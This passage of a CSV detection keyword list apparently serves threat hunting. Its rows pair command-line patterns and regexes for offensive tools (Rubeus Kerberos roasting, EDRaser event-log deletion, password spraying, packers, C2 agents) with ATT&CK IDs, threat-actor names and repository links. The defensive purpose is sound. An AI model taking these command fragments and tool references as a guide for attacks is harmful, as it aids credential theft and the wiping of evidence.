whoami*",".{0,1000}\s\-\-args\swhoami.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","275" "* args_spoofing-rs.exe*",".{0,1000}\sargs_spoofing\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","276" "* arp.x64.o",".{0,1000}\sarp\.x64\.o","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - 
FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","0","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","277" "* arsenal-master.zip*",".{0,1000}\sarsenal\-master\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","278" "* Ask4Creds.ps1*",".{0,1000}\sAsk4Creds\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","279" "* Ask4Creds.ps1*",".{0,1000}\sAsk4Creds\.ps1.{0,1000}","offensive_tool_keyword","Ask4Creds","Prompt User for credentials","T1056 - T1071","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Leo4j/Ask4Creds","1","0","N/A","N/A","8","1","1","0","2024-03-20T17:09:21Z","2023-11-12T15:21:40Z","280" "* asktgs * /ticket:*",".{0,1000}\sasktgs\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","281" "* asktgs *.kirbi*",".{0,1000}\sasktgs\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","282" "* asktgs /ticket:*",".{0,1000}\sasktgs\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","283" "* asktgt * /service:*",".{0,1000}\sasktgt\s.{0,1000}\s\/service\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","284" "* asktgt /user *",".{0,1000}\sasktgt\s\/user\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","285" "* asktgt /user:{0} /certificate:{1} /password:""{2}"" *",".{0,1000}\sasktgt\s\/user\:\{0\}\s\/certificate\:\{1\}\s\/password\:\""\{2\}\""\s.{0,1000}","offensive_tool_keyword","KrbRelay","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","286" "* asktgt /user:{0} /certificate:{1} /password:""{2}"" *",".{0,1000}\sasktgt\s\/user\:\{0\}\s\/certificate\:\{1\}\s\/password\:\""\{2\}\""\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","287" "* asktht /user:*",".{0,1000}\sasktht\s\/user\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for 
raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","288" "* asm.py -t * -ln -w resources/*.txt -o *",".{0,1000}\sasm\.py\s\-t\s.{0,1000}\s\-ln\s\-w\sresources\/.{0,1000}\.txt\s\-o\s.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","289" "* asn-query.nse*",".{0,1000}\sasn\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","290" "* --asrep --domain * --user * --pass *",".{0,1000}\s\-\-asrep\s\-\-domain\s.{0,1000}\s\-\-user\s.{0,1000}\s\-\-pass\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","291" "* asreproast *",".{0,1000}\sasreproast\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","292" "* --asreproast *",".{0,1000}\s\-\-asreproast\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","293" "* --asreproast *",".{0,1000}\s\-\-asreproast\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","294" "* --asreproast*",".{0,1000}\s\-\-asreproast.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","295" "* ASREProastables.txt*",".{0,1000}\sASREProastables\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive 
tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","296" "* ASREProastables.txt*",".{0,1000}\sASREProastables\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","297" "* --assemblyargs AntiVirus*",".{0,1000}\s\-\-assemblyargs\sAntiVirus.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - 
Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","298" "* --assemblyargs AppLocker*",".{0,1000}\s\-\-assemblyargs\sAppLocker.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - 
Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","299" "* --asstrongasfuck-opts *",".{0,1000}\s\-\-asstrongasfuck\-opts\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","300" "* --asstrongasfuck-path *",".{0,1000}\s\-\-asstrongasfuck\-path\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","301" "* atexec-pro.py*",".{0,1000}\satexec\-pro\.py.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","N/A","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","302" "* Athena.Commands*",".{0,1000}\sAthena\.Commands.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","303" "* Athena.Models.*",".{0,1000}\sAthena\.Models\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","304" "* athena.mythic*",".{0,1000}\sathena\.mythic.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","305" "* atomizer.py *",".{0,1000}\satomizer\.py\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","9","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","306" "* --atompepacker-args *",".{0,1000}\s\-\-atompepacker\-args\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","307" "* --attack bruteforce*",".{0,1000}\s\-\-attack\sbruteforce.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","308" "* --attack injection*",".{0,1000}\s\-\-attack\sinjection.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","309" "* --attack partial_d --key *",".{0,1000}\s\-\-attack\spartial_d\s\-\-key\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","310" "* --attack partial_q --key *",".{0,1000}\s\-\-attack\spartial_q\s\-\-key\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","311" "* -attack remote_db -db_type * -db_username * -db_password *",".{0,1000}\s\-attack\sremote_db\s\-db_type\s.{0,1000}\s\-db_username\s.{0,1000}\s\-db_password\s.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","312" "* --attack vulns *",".{0,1000}\s\-\-attack\svulns\s.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","313" "* -attack windows_application_event_log_local*",".{0,1000}\s\-attack\swindows_application_event_log_local.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","314" "* -attack windows_event_log*",".{0,1000}\s\-attack\swindows_event_log.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","315" "* -attack windows_security_event_log_remote*",".{0,1000}\s\-attack\swindows_security_event_log_remote.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","316" "* --attacker-host *",".{0,1000}\s\-\-attacker\-host\s.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","317" "* --attacker-port *",".{0,1000}\s\-\-attacker\-port\s.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","318" "* -attak 
syslog*",".{0,1000}\s\-attak\ssyslog.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","319" "* audit AlwaysInstallElevated*",".{0,1000}\saudit\sAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","320" "* audit CachedGPPPassword*",".{0,1000}\saudit\sCachedGPPPassword.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","321" "* audit DomainGPPPassword*",".{0,1000}\saudit\sDomainGPPPassword.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
